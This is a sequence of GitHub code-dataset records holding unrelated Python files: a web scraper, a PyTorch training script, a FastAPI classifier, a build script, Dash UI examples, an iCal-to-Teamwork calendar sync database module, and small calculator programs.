for uibox in uiboxs:\n category = uibox.xpath(\".//div[@class='uibox-title']/a/text()\").get()\n urls = uibox.xpath(\".//ul/li/a/img/@src\").getall()\n # for url in urls:\n # url = response.urljoin(url)\n # print(url)\n urls = list(map(lambda url: response.urljoin(url), urls))\n item = FerrariItem(category=category, image_urls=urls)\n yield item\n\n","repo_name":"Beasure/ferrari","sub_path":"ferrari/spiders/ferrari488.py","file_name":"ferrari488.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2643875522","text":"import os\nimport sys\nimport signal\nimport json\nimport logging\nimport argparse\nimport torch\nfrom model import *\nfrom model.loss import *\nfrom model.metric import *\nfrom data_loader import getDataLoader\nfrom trainer import *\nfrom logger import Logger\n\nlogging.basicConfig(level=logging.INFO, format='')\ndef set_procname(newname):\n from ctypes import cdll, byref, create_string_buffer\n newname=os.fsencode(newname)\n libc = cdll.LoadLibrary('libc.so.6') #Loading a 3rd party library C\n buff = create_string_buffer(len(newname)+1) #Note: One larger than the name (man prctl says that)\n buff.value = newname #Null terminated string as it should be\n libc.prctl(15, byref(buff), 0, 0, 0) #Refer to \"#define\" of \"/usr/include/linux/prctl.h\" for the misterious value 16 & arg[3..5] are zero as the man page says.\n\ndef main(config, resume):\n set_procname(config['name'])\n #np.random.seed(1234) I don't have a way of restarting the DataLoader at the same place, so this makes it totaly random\n train_logger = Logger()\n\n split = config['split'] if 'split' in config else 'train'\n data_loader, valid_data_loader = getDataLoader(config,split)\n #valid_data_loader = data_loader.split_validation()\n\n model = eval(config['arch'])(config['model'])\n 
model.summary()\n if type(config['loss'])==dict:\n loss={}#[eval(l) for l in config['loss']]\n for name,l in config['loss'].items():\n loss[name]=eval(l)\n else:\n loss = eval(config['loss'])\n if type(config['metrics'])==dict:\n metrics={}\n for name,m in config['metrics'].items():\n metrics[name]=[eval(metric) for metric in m]\n else:\n metrics = [eval(metric) for metric in config['metrics']]\n\n if 'class' in config['trainer']:\n trainerClass = eval(config['trainer']['class'])\n else:\n trainerClass = Trainer\n trainer = trainerClass(model, loss, metrics,\n resume=resume,\n config=config,\n data_loader=data_loader,\n valid_data_loader=valid_data_loader,\n train_logger=train_logger)\n\n def handleSIGINT(sig, frame):\n trainer.save()\n sys.exit(0)\n signal.signal(signal.SIGINT, handleSIGINT)\n\n print(\"Begin training\")\n trainer.train()\n\n\nif __name__ == '__main__':\n logger = logging.getLogger()\n\n parser = argparse.ArgumentParser(description='PyTorch Template')\n parser.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n parser.add_argument('-r', '--resume', default=None, type=str,\n help='path to checkpoint (default: None)')\n parser.add_argument('-s', '--soft_resume', default=None, type=str,\n help='path to checkpoint that may or may not exist (default: None)')\n parser.add_argument('-g', '--gpu', default=None, type=int,\n help='gpu to use (overrides config) (default: None)')\n #parser.add_argument('-m', '--merged', default=False, action='store_const', const=True,\n # help='Use combine train and valid sets.')\n\n args = parser.parse_args()\n\n config = None\n if args.config is not None:\n config = json.load(open(args.config))\n if args.resume is None and args.soft_resume is not None:\n if not os.path.exists(args.soft_resume):\n print('WARNING: resume path ({}) was not found, starting from scratch'.format(args.soft_resume))\n else:\n args.resume = args.soft_resume\n if args.resume is not None and (config is None or 'override' not in config or not config['override']):\n if args.config is not None:\n logger.warning('Warning: --config overridden by --resume')\n config = torch.load(args.resume)['config']\n elif args.config is not None and args.resume is None:\n path = os.path.join(config['trainer']['save_dir'], config['name'])\n if os.path.exists(path):\n directory = os.fsencode(path)\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename!='config.json': \n assert False, \"Path {} already used!\".format(path)\n\n assert config is not None\n\n if args.gpu is not None:\n config['gpu']=args.gpu\n print('override gpu to '+str(config['gpu']))\n\n if config['cuda']:\n with torch.cuda.device(config['gpu']):\n main(config, args.resume)\n else:\n main(config, args.resume)\n","repo_name":"herobd/Visual-Template-Free-Form-Parsing","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"44"} +{"seq_id":"15302908096","text":"import pandas as pd\nimport numpy as np\n# https://pbpython.com/pandas-list-dict.html\n\n\n# df = pd.DataFrame(calculation)\ndf = pd.read_csv('../data/anushree_testcase_2.csv')\nprint(df)\nbins = 100\n# df['binned'] = pd.cut(df['percentage'], bins)\npdf = pd.cut(df, bins).count()\nprint(pdf)\n\n# Perform a shape check on the DataFrame\n# ValueError: Buffer has wrong number of dimensions (expected 1, got 
2)\n","repo_name":"Krishnaarunangsu/XpressoArunangsu","sub_path":"src/as_1.py","file_name":"as_1.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42662776873","text":"from fastapi import FastAPI\nfrom fastapi import File\nfrom fastapi import Form\nfrom fastapi import UploadFile\nfrom fastapi.responses import JSONResponse\nfrom app.utils import *\nimport uvicorn\n\napp = FastAPI()\n\n@app.post('/image')\nasync def image_post(\n image: UploadFile = File(...)\n):\n prediction, probas, classes = classify_image(image)\n return JSONResponse(status_code=200, content={'prediction': prediction, 'probs': probas, 'classes': classes})\n\n@app.post('/text')\nasync def text_post(\n text: str = Form(...)\n):\n prediction, probas, classes = classify_text(text)\n return JSONResponse(status_code=200, content={'prediction': prediction, 'probs': probas, 'classes': classes})\n\n@app.post('/combined')\nasync def combined_post(\n image: UploadFile = File(...),\n text: str = Form(...)\n):\n prediction, probas, classes = classify_combined(image, text)\n return JSONResponse(status_code=200, content={'prediction': prediction, 'probs': probas, 'classes': classes})\n\nif __name__ == '__main__':\n uvicorn.run('api:app', host='0.0.0.0', port=8080, reload=True)","repo_name":"abuhasan12/Facebook-Marketplace-s-Recommendation-Ranking-System","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42289275754","text":"import os\nimport sys\nfrom shutil import copytree, rmtree, copy\nimport platform\n\ndirname = os.path.abspath(os.path.dirname(__file__))\ntemplatepath_name = \"n42Templates\"\nbasespectra_name = \"baseSpectra\"\nbuildpath = os.path.join(dirname, \"build\")\ndistpath = os.path.join(dirname, \"dist\")\n\nif not os.path.exists(distpath):\n os.makedirs(distpath)\n\n# Ensure latest ui\nr = os.system(sys.executable + \" build-ui.py\")\nif r: exit(r)\n\n# Ensure documentation is compiled\nr = os.system(f\"sphinx-build -M html \\\"{os.path.join(dirname, 'doc')}\\\" \\\"{os.path.join(dirname, 'doc', '_build')}\\\"\")\nif r: exit(r)\n\n# Main RASE app\noptions = \"--onedir --windowed\" if platform.system() == \"Darwin\" else \"\"\nr = os.system(sys.executable + \" -m PyInstaller -a -y \" + options +\n \" --distpath \" + distpath +\n \" --workpath \" + buildpath +\n \" rase.spec\")\nif r: exit(r)\n\n# Templates and base spectra\nfor source_name in (templatepath_name, basespectra_name):\n destination_path = os.path.join(distpath, source_name)\n rmtree(destination_path, ignore_errors=True)\n copytree(os.path.join(dirname, source_name), destination_path)\n\n# tools\ntools_path = os.path.join(distpath, \"ReplayTools\")\nrmtree(tools_path, ignore_errors=True)\nos.makedirs(tools_path)\ncopy(os.path.join(dirname, \"tools\", \"FLIR-R440-ReplayTool-Wrapper.cmd\"), tools_path)\n\n# demo replay tool\nr = os.system(sys.executable + \" -m PyInstaller -a -y -F --noupx\" +\n \" --distpath \" + os.path.join(distpath, 'ReplayTools') +\n \" --workpath \" + buildpath + \" \" +\n os.path.join(dirname, \"tools\",\"demo_replay.py\"))\nif r: exit(r)\n\n# Translators\nr = os.system(sys.executable + \" \" + os.path.join(dirname, \"translators\", \"create_translators_exe.py\"))\nif r: exit(r)\n\nif platform.system() == \"Darwin\":\n import dmgbuild\n print(\"Creating App Bundle\")\n translators_path = 
os.path.join(dirname, 'translators', 'dist')\n dmgbuild.build_dmg(volume_name=\"RASE\",\n filename=os.path.join(distpath, \"rase.dmg\"),\n settings_file=\"dmgbuild_settings.py\",\n settings={'files': [os.path.join(distpath, 'rase.app'),\n translators_path,\n tools_path,\n templatepath_name,\n basespectra_name]},\n )\n","repo_name":"LLNL/RASE","sub_path":"create_distributable.py","file_name":"create_distributable.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"44"} +{"seq_id":"11786357087","text":"import dash_bootstrap_components as dbc\nfrom dash import html\n\nalerts = html.Div(\n [\n dbc.Alert(\n [\n html.I(className=\"bi bi-info-circle-fill me-2\"),\n \"An example info alert with an icon\",\n ],\n color=\"info\",\n className=\"d-flex align-items-center\",\n ),\n dbc.Alert(\n [\n html.I(className=\"bi bi-check-circle-fill me-2\"),\n \"An example success alert with an icon\",\n ],\n color=\"success\",\n className=\"d-flex align-items-center\",\n ),\n dbc.Alert(\n [\n html.I(className=\"bi bi-exclamation-triangle-fill me-2\"),\n \"An example warning alert with an icon\",\n ],\n color=\"warning\",\n className=\"d-flex align-items-center\",\n ),\n dbc.Alert(\n [\n html.I(className=\"bi bi-x-octagon-fill me-2\"),\n \"An example danger alert with an icon\",\n ],\n color=\"danger\",\n className=\"d-flex align-items-center\",\n ),\n ]\n)\n","repo_name":"facultyai/dash-bootstrap-components","sub_path":"docs/components_page/components/alert/icon.py","file_name":"icon.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1025,"dataset":"github-code","pt":"44"} +{"seq_id":"39397625454","text":"from support import version, icalparser\nfrom support.tw_logging import log\n__author__ = version.get_author()\n__version__ = version.get_version()\n\nfrom random import randint\nimport sqlite3, logging, time\nimport requests.exceptions, logging\n\n\n'''\nClass: icalObject\nDescription: wraps parsed ical data for easier implementation\n'''\n\n\nclass parentObject():\n def __init__(self, parent):\n self.__parent = parent\n def get_id(self):\n try:\n return self.__parent[0]\n except TypeError:\n return self.__parent\n def get_project_id(self):\n try:\n return self.__parent[1]\n except TypeError:\n return self.__parent\n def get_ical_link(self):\n try:\n return self.__parent[2]\n except TypeError:\n return self.__parent\n def get_event_id(self):\n try:\n return self.__parent[3]\n except TypeError:\n return self.__parent\n def get_event_name(self):\n try:\n return self.__parent[4]\n except TypeError:\n return self.__parent\n def get_last_sync(self):\n try:\n return self.__parent[5]\n except TypeError:\n return self.__parent\n\nclass icalObject(parentObject):\n def __init__(self, listing, cutoff):\n parentObject.__init__(self,listing)\n self.__listing = listing\n self.__cutoff = cutoff\n self.__parser = None\n def generate(self):\n self.__parser = icalparser.Connect(self.get_ical_link())\n return -1\n def get_type(self):\n return self.__parser.get_type()\n def get_events(self):\n if self.__parser == None:\n self.generate()\n events = self.__parser.get_to_date(self.__cutoff)\n out_list = list()\n for event in events:\n out_list.append(entry_icalObject(event))\n return out_list\n\n'''\nClass: entryObject\nDescription: wraps entry object from database for easier access.\n'''\n\nclass entryObject():\n def __init__(self, entry):\n self.__entry = entry\n\n def 
get_ical_id(self):\n return self.__entry[0]\n @property\n def ical_id(self):\n return self.get_ical_id()\n\n def get_start(self):\n return self.__entry[1]\n @property\n def start(self):\n return self.get_start()\n\n def get_end(self):\n return self.__entry[2]\n @property\n def end(self):\n return self.get_end()\n\n def get_amount(self):\n return self.__entry[3]\n @property\n def amount(self):\n return self.get_amount()\n\n def get_guest(self):\n return self.__entry[4]\n @property\n def guest(self):\n return self.get_guest()\n\n def get_service(self):\n return self.__entry[5]\n @property\n def service(self):\n return self.get_service()\n\n def get_email(self):\n return self.__entry[6]\n @property\n def email(self):\n return self.get_email()\n\n def get_phone(self):\n return self.__entry[7]\n @property\n def phone(self):\n return self.get_phone()\n\n def get_posted(self):\n return self.__entry[8]\n @property\n def posted(self):\n return self.get_posted()\n\n def get_delete(self):\n return self.__entry[9]\n @property\n def delete(self):\n return self.get_delete()\n\n def get_post_id(self):\n return self.__entry[10]\n @property\n def post_id(self):\n return self.get_post_id()\n\n def get_entry_id(self):\n return self.__entry[11]\n @property\n def entry_id(self):\n return self.get_entry_id()\n\n def get_cleaning_entry(self):\n return self.__entry[12]\n @property\n def cleaning_entry(self):\n return self.get_cleaning_entry()\n\n def set_remove_log(self, operation):\n try:\n self.__remove += operation\n except AttributeError:\n self.__remove = 0\n self.__remove += 1\n def get_remove_log(self):\n try:\n return self.__remove\n except AttributeError:\n return -1\n\n'''\nClass: entryparentObject\nDescription: Adds parent data to entryObject class\n'''\n\n\nclass entryparentObject(entryObject):\n def __init__(self, entry, parent):\n entryObject.__init__(self, entry)\n self.__parent = parent\n def get_project_id(self):\n try:\n return self.__parent[1]\n except TypeError:\n return self.__parent\n def get_event_id(self):\n try:\n return self.__parent[3]\n except TypeError:\n return self.__parent\n def get_event_name(self):\n try:\n return self.__parent[4]\n except TypeError:\n return self.__parent\n def get_last_sync(self):\n try:\n return self.__parent[5]\n except TypeError:\n return self.__parent\n\n\n\n'''\nClass: entry_icalObject\nDescription: Wraps individual ical entry for easier manipulation.\n'''\n\nclass entry_icalObject():\n def __init__(self, entry_candidate):\n self.__entry = entry_candidate\n def get_start(self):\n return self.__entry['start']\n def get_end(self):\n return self.__entry['end']\n def get_guest(self):\n return self.__entry['guest']\n def get_phone(self):\n try:\n return self.__entry['phone']\n except KeyError:\n return ''\n def get_email(self):\n try:\n return self.__entry['email']\n except KeyError:\n return ''\n def get_amount(self):\n return 0\n\nclass MainFile():\n def __init__(self, db_file):\n self.__db_file = db_file\n self.__conn = sqlite3.connect(db_file)\n self.__c = self.__conn.cursor()\n\n def save(self):\n self.__conn.commit()\n\n def close(self):\n self.__conn.close()\n\n def testdb(self):\n valid_db = ['config', 'listings', 'entries']\n test_db = list()\n for table_name in self.__c.execute(\"SELECT name FROM sqlite_master WHERE type='table'\"):\n for table in table_name:\n test_db.append(table)\n\n if valid_db == test_db:\n return 1\n else:\n return -1\n\n def get_from_config(self, idx):\n try:\n config = str()\n for client_data in self.__c.execute('SELECT * FROM 
config'):\n config = client_data[idx]\n if config == str():\n return -1\n else:\n return config\n except sqlite3.OperationalError:\n return -1\n\n def get_company_id(self):\n return self.get_from_config(0)\n\n def get_cutoff(self):\n return self.get_from_config(1)\n\n def get_cleaning_event(self):\n return self.get_from_config(2)\n\n def set_company_id_cutoff_cleaning(self, company_id, cutoff, cleaning_event):\n cur_id = self.get_company_id()\n if cur_id == -1:\n self.__c.execute(\"INSERT INTO config VALUES ('{}', '{}', '{}')\".format(company_id, cutoff, cleaning_event))\n return 1\n else:\n return -1\n\n def get_listings(self):\n out_list = list()\n for listing in self.__c.execute(\"SELECT * FROM listings\"):\n out_list.append(listing)\n return out_list\n\n def get_listings_objects(self):\n listings = self.get_listings()\n out_list = list()\n for listing in listings:\n out_list.append(parentObject(listing))\n return out_list\n\n def iter_listings(self):\n for listing in self.__c.execute(\"SELECT * FROM listings\"):\n yield listing\n\n def iter_entries(self):\n for entry in self.__c.execute(\"SELECT * FROM entries\"):\n yield entry\n\n def get_listing(self, id, idx=0):\n out_listing = None\n for listing in self.iter_listings():\n if listing[idx] == id:\n out_listing = listing\n if out_listing != None:\n return out_listing\n else:\n return -1\n\n def get_entries(self):\n out_list = list()\n for entry in self.iter_entries():\n out_list.append(entry)\n return out_list\n def get_entries_listing(self, id):\n entries = self.get_entries()\n out_list = list()\n for entry in entries:\n if id == entry[0]:\n entry_parent = self.get_listing(entry[0])\n out_list.append(entryparentObject(entry, entry_parent))\n return out_list\n def iter_entries_objects(self):\n for entry in self.iter_entries():\n yield entryObject(entry)\n def stay_duration_calc(self, start, end):\n return -1\n def get_entries_parent_objects(self):\n out_list = list()\n entries = self.get_entries()\n for entry in entries:\n entry_parent = self.get_listing(entry[0])\n out_list.append(entryparentObject(entry, entry_parent))\n return out_list\n\n def get_pending_entries(self):\n out_list_add = list()\n out_list_rem = list()\n entries = self.get_entries_parent_objects()\n for entry in entries:\n if entry.get_delete() == 1:\n out_list_rem.append(entry)\n elif entry.get_posted() == 0:\n out_list_add.append(entry)\n return out_list_add,out_list_rem\n\n def get_pending_cleaning_entries(self):\n out_list_add = list()\n out_list_rem = list()\n entries = self.get_entries_parent_objects()\n for entry in entries:\n if entry.get_delete() == 1 and entry.get_cleaning_entry() != '':\n out_list_rem.append(entry)\n elif entry.get_delete() == 1 and entry.get_post_id() == -1:\n out_list_rem.append(entry)\n elif entry.get_posted() == 1 and entry.get_cleaning_entry() == '':\n out_list_add.append(entry)\n return out_list_add, out_list_rem\n\n def get_posted_entries(self):\n out_list = list()\n entries = self.get_entries_parent_objects()\n for entry in entries:\n if entry.get_posted() == 1:\n out_list.append(entry)\n return out_list\n\n def get_ical_present(self, ical_link, idx=1):\n present = False\n for ical_check in self.iter_listings():\n if ical_check[idx] == ical_link: present = True\n return present\n\n def get_entry_present(self, entry_test, parent_ical):\n parentId = parent_ical.get_id()\n present = 0\n for entry in self.iter_entries():\n entry_obj = entryObject(entry)\n if entry_obj.get_ical_id() == parentId:\n if entry_test.get_start() == 
entry_obj.get_start() and entry_test.get_end() == entry_obj.get_end() and entry_test.get_guest() == entry_obj.get_guest():\n present += 1\n if present == 1:\n return True\n elif present == 0:\n return False\n\n def append_entry(self, entry, parent_ical, id = None):\n ical_id = parent_ical.get_id()\n start_date = entry.get_start()\n leave_date = entry.get_end()\n amount = entry.get_amount()\n guest = entry.get_guest()\n service = parent_ical.get_type()\n email = entry.get_email()\n phone = entry.get_phone()\n if id == None:\n entry_id = self.get_unique_random_entry()\n else:\n entry_id = id\n print('ICAL_ID = {} S = {} E = {}'.format(ical_id, start_date, leave_date))\n try:\n self.__c.execute(\"INSERT INTO entries VALUES ('{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}')\".format(ical_id, start_date, leave_date, amount, guest, service, email, phone, 0, 0, '', entry_id, ''))\n except sqlite3.OperationalError:\n log.warning(\"Entry Skipped\", \"Entry with title - {} - has been skipped\".format(guest))\n logging.info(\"Skipping:\\n Name: {}\".format(guest))\n print('skipping')\n def set_mark_remove(self, entry, remove_step = 1):\n params = (remove_step, entry.get_entry_id())\n sql = ''' UPDATE entries\n SET \"delete\" = ?\n WHERE \"entry id\" = ?'''\n self.__c.execute(sql, params)\n return -1\n\n def remove_entry(self, entry):\n params = entry.get_entry_id()\n self.__c.execute(\"DELETE FROM entries WHERE \\\"entry id\\\" = '{}'\".format(params))\n logging.info(\"Entry '{}' removed from calendar database\".format(entry.get_entry_id()))\n self.save()\n return -1\n\n def remove_listing(self, ical_id):\n self.__c.execute(\"DELETE FROM listings WHERE \\\"ical id\\\" = '{}'\".format(ical_id))\n logging.info(\"Listing id '{}' removed from calendar database\".format(ical_id))\n self.save()\n return -1\n\n def get_pending_teamwork_actions(self):\n pending_additions = 0\n pending_removals = 0\n for entry in self.iter_entries_objects():\n if entry.get_delete() == 1:\n pending_removals += 1\n if entry.get_posted() == 0:\n pending_additions += 1\n return pending_additions, pending_removals\n\n def update_entry_id(self, entry, id):\n params = (id, entry.get_entry_id())\n sql = ''' UPDATE entries\n SET posted = 1 ,\n \"post id\" = ?\n WHERE \"entry id\" = ?'''\n self.__c.execute(sql, params)\n return -1\n\n def update_entry_cleaning_id(self, entry, id):\n params = (id, entry.get_entry_id())\n sql = ''' UPDATE entries\n SET \"cleaning id\" = ?\n WHERE \"entry id\" = ?'''\n self.__c.execute(sql, params)\n return -1\n\n def set_listing_last_sync(self, listingobj):\n params = (time.time(), listingobj.get_id())\n sql = ''' UPDATE listings\n SET \"last sync\" = ?\n WHERE \"ical id\" = ?'''\n self.__c.execute(sql, params)\n self.save()\n return -1\n\n def sync_icals(self):\n listings = self.get_listings()\n entries = self.get_entries_parent_objects()\n for listing in listings:\n ical_listing = icalObject(listing, self.get_cutoff())\n ical_events = ical_listing.get_events()\n print(ical_events)\n logging.debug('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')\n logging.debug(listing[2])\n logging.debug(ical_events)\n logging.debug('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')\n if ical_events != list():\n for ical_event in ical_events:\n for entry in entries:\n if entry.get_guest() == ical_event.get_guest() and entry.get_start() == ical_event.get_start() and entry.get_end() == ical_event.get_end() and ical_listing.get_id() == entry.get_ical_id():\n entry.set_remove_log(1)\n if not 
self.get_entry_present(ical_event, ical_listing):\n self.append_entry(ical_event, ical_listing)\n for entry in entries:\n if entry.get_remove_log() == -1:\n logging.info(\"No match found in ical for '{}'. Set to remove from teamwork.\".format(entry.get_entry_id()))\n self.set_mark_remove(entry)\n self.save()\n def sync_listing_ical(self, listingobj):\n listing = self.get_listing(listingobj.get_id())\n ical_object = icalObject(listing, self.get_cutoff())\n try:\n ical_events = ical_object.get_events()\n except requests.ConnectionError:\n exit()\n entries = self.get_entries_listing(listingobj.get_id())\n logging.info(\"Listing '{}' Listing ID '{}'\".format(ical_object.get_event_name(), ical_object.get_id()))\n out_value = 0\n if ical_events != []:\n for ical_event in ical_events:\n for entry in entries:\n if entry.get_guest() == ical_event.get_guest()\\\n and entry.get_start() == ical_event.get_start() \\\n and entry.get_end() == ical_event.get_end() \\\n and ical_object.get_id() == entry.get_ical_id():\n entry.set_remove_log(1)\n if not self.get_entry_present(ical_event, ical_object):\n self.append_entry(ical_event, ical_object)\n self.save()\n out_value = 1\n for entry in entries:\n if entry.get_remove_log() == -1:\n logging.info(\"No match found in ical for '{}'. Set to remove from teamwork.\".format(entry.get_entry_id()))\n self.set_mark_remove(entry)\n self.set_mark_remove(entry)\n self.set_listing_last_sync(listingobj)\n return out_value == 1\n def sync_teamwork(self, teamwork):\n pending_entries_add, pending_entries_remove = self.get_pending_entries()\n for entry in pending_entries_add:\n post_id = teamwork.post_calendarevent(entry)\n print(post_id)\n if not post_id:\n logging.warning(\"'{}' - Failed to upload to teamwork.\".format(entry.get_entry_id()))\n continue\n else:\n logging.info(\"'{}' - Upload to teamwork with the posting id '{}'\".format(entry.get_entry_id(), post_id))\n self.update_entry_id(entry, post_id)\n pending_entries_cleaning_add, pending_entries_cleaning_remove = self.get_pending_cleaning_entries()\n for entry in pending_entries_cleaning_add:\n start = entry.get_end()\n end = entry.get_end()\n title = '{} - Cleaning'.format(entry.get_event_name())\n description = ''\n where = entry.get_event_name()\n project_id = entry.get_project_id()\n event_id = self.get_cleaning_event()\n post_id = teamwork.post_calendarevent_cleaning(start=start,end=end,title=title,description=description,\n where=where,project_id=project_id, event_id=event_id)\n if not post_id:\n logging.warning(\"'{}' - Cleaning event failed to upload to teamwork.\".format(entry.get_entry_id()))\n else:\n self.update_entry_cleaning_id(entry, post_id)\n self.save()\n for entry in pending_entries_cleaning_remove:\n if entry.get_cleaning_entry() != -1:\n remove_status = teamwork.remove_calendarevent(entry.get_cleaning_entry())\n if remove_status == 1:\n self.update_entry_cleaning_id(entry, -1)\n elif remove_status == -1:\n logging.warning(\"'{}' - Cleaning event failed to remove from teamwork\".format(self.get_cleaning_event()))\n for entry in pending_entries_remove:\n if entry.get_post_id() != -1:\n remove_status = teamwork.remove_calendarevent(entry.get_post_id())\n if remove_status == 1:\n self.update_entry_id(entry,-1)\n elif entry.get_post_id() == -1:\n remove_status = 1\n if remove_status == 1 and entry.get_cleaning_entry() == -1:\n self.remove_entry(entry)\n self.save()\n return -1\n\n def remove_all_posted(self, teamwork):\n posted_entries = self.get_posted_entries()\n for entry in posted_entries:\n if 
entry.get_cleaning_entry() != '' and entry.get_cleaning_entry() != -1:\n cleaning_remove_status = teamwork.remove_calendarevent(entry.get_cleaning_entry())\n else:\n cleaning_remove_status = 1\n if cleaning_remove_status == 1:\n self.update_entry_cleaning_id(entry, -1)\n remove_status = teamwork.remove_calendarevent(entry.get_post_id())\n else:\n remove_status = -1\n if remove_status == 1:\n self.remove_entry(entry)\n return -1\n\n def get_unique_random(self):\n numgen = randgen()\n match = True\n listings = self.get_listings()\n id = numgen.generate()\n while match:\n id = numgen.generate()\n count_match = 0\n for listing in listings:\n if id == listing[0]:\n count_match += 1\n if count_match == 0:\n match = False\n return id\n\n def get_unique_random_entry(self):\n numgen = randgen()\n match = True\n entries = self.get_entries()\n id = numgen.threegen()\n while match:\n id = numgen.threegen()\n count_match = 0\n for entry in entries:\n if id == entry[11]:\n count_match += 1\n if count_match == 0:\n match = False\n return id\n\n def append_ical(self, ical_link, project_id, event_id, event_name):\n if not self.get_ical_present(ical_link):\n unique_id = self.get_unique_random()\n self.__c.execute(\"INSERT INTO listings VALUES ('{}','{}','{}','{}','{}', '{}')\".format(unique_id,project_id,ical_link,event_id,event_name,0))\n return 1\n else:\n return -1\n\nclass randgen():\n def __init__(self):\n self.__alph = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',1,2,3,4,5,6,7,8,9]\n self.__alphlen = self.__alph.__len__() - 1\n def generate(self):\n int1 = randint(0, self.__alphlen)\n int2 = randint(0, self.__alphlen)\n return '{}{}'.format(self.__alph[int1], self.__alph[int2])\n def threegen(self):\n int1 = randint(0, self.__alphlen)\n int2 = randint(0, self.__alphlen)\n int3 = randint(0, self.__alphlen)\n return '{}{}{}'.format(self.__alph[int1], self.__alph[int2], self.__alph[int3])\n\ndef createdb(file_name, company_id=98287, start_week=2, cleaning_event=106880):\n time_offset = start_week * 24 * 60 * 60 * 7\n cutoff_date = int(time.time()) - time_offset\n conn = sqlite3.connect(file_name)\n c = conn.cursor()\n c.execute('''CREATE TABLE config\n ('company_id' id, 'cutoff_date' date, 'cleaning event type' id )''')\n c.execute('''CREATE TABLE listings\n ('ical id' id, 'project id' id, 'ical link' text, 'event id' id, 'event name' text, 'last sync' date)''')\n c.execute('''CREATE TABLE entries\n ('ical id' id, 'arrival date' date, 'leave date' date, 'amount' money, 'guest' name, 'service' int, 'email' name, 'phone' text, 'posted' BIT, 'delete' BYTE, 'post id' id, 'entry id' id, 'cleaning id' id)''')\n conn.commit()\n conn.close()\n new_file = MainFile(file_name)\n new_file.set_company_id_cutoff_cleaning(company_id, cutoff_date, cleaning_event)\n new_file.save()\n return new_file\n\ndef testdb(file_name):\n test_file = MainFile(file_name)\n return test_file.testdb()\n\nif __name__ == \"__main__\":\n test_db = \"calendar.db\"\n db = MainFile(test_db)","repo_name":"greasysock/bnbCalendar","sub_path":"support/calendardb.py","file_name":"calendardb.py","file_ext":"py","file_size_in_byte":23028,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"7716701732","text":"'''\r\nWrite a Desktop Python program to get first \r\nand last name from user to display full name \r\nto user.\r\n'''\r\n\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\ndef calculate_cube():\r\n try:\r\n # 
Get the number from the entry widget\r\n num = float(entry.get())\r\n \r\n # Calculate the cube of the number\r\n cube = num ** 3\r\n \r\n # Display the result\r\n result_label.config(text=f\"Cube of {num} is: {cube}\")\r\n except ValueError:\r\n # Show an error message if the input is not a valid number\r\n messagebox.showerror(\"Error\", \"Please enter a valid number!\")\r\n\r\nif __name__==\"__main__\":\r\n\t# Create the main window\r\n\troot = tk.Tk()\r\n\troot.title(\"Cube Calculator\")\r\n\r\n\t# Label to prompt the user\r\n\tprompt_label = tk.Label(root, text=\"Enter a number:\")\r\n\tprompt_label.pack(pady=10)\r\n\r\n\t# Entry widget for user input\r\n\tentry = tk.Entry(root)\r\n\tentry.pack(pady=10)\r\n\r\n\t# Button to trigger the calculation\r\n\tcalc_button = tk.Button(root, text=\"Calculate Cube\", command=calculate_cube)\r\n\tcalc_button.pack(pady=10)\r\n\r\n\t# Label to display the result\r\n\tresult_label = tk.Label(root, text=\"\")\r\n\tresult_label.pack(pady=10)\r\n\r\n\t# Run the application\r\n\troot.mainloop()\r\n\r\n","repo_name":"alexandercooper97/300-Python-Exercises","sub_path":"02_Intermediate/Problem_188/assignment_188.py","file_name":"assignment_188.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72329780292","text":"\r\nimport time\r\n\r\nhrs=float(input('Quantos voce ganha por hora ?'))\r\nhrspordia=float(input('Quantas horas trabalhado por mês ?'))\r\n\r\nsalarioSemHrsExtras = hrs * hrspordia\r\nprint(f'salario sem hrs extras: {salarioSemHrsExtras:,.2f}')\r\n\r\n\r\nhrsExtras = float(input('Quantas horas extras fez por mês sem adicional noturno ?'))\r\n\r\ncomHrsExtras = hrsExtras + (hrsExtras*25/100)\r\nsalarioComHrsExtras = salarioSemHrsExtras + (hrs * comHrsExtras)\r\nprint(f'salario bruto com horas extras: {salarioComHrsExtras:,.2f}')\r\n\r\nadicionalNoturno = input('teve adicional noturno sim/nao: ')\r\nif adicionalNoturno == 'sim' and 'Sim':\r\n hrsExtrasAdicionalNoturno = float(input('Quantas hrs adicional noturno fez por mes ?'))\r\n ComAdicionalNoturno = hrsExtrasAdicionalNoturno + (hrsExtrasAdicionalNoturno*25/100)\r\n salarioComAdicionalNoturno = ComAdicionalNoturno + (ComAdicionalNoturno * hrs)\r\n salarioComAdicionalNoturno = salarioComAdicionalNoturno + salarioComHrsExtras\r\n print(f'Salario bruto com adicional noturno: {salarioComAdicionalNoturno:,.2f}')\r\nelse:\r\n print('fim')\r\ntime.sleep(10)","repo_name":"danielnakaharaa/salario.github.io","sub_path":"salario (3).py","file_name":"salario (3).py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70569677252","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport time\nfrom kazoo.client import 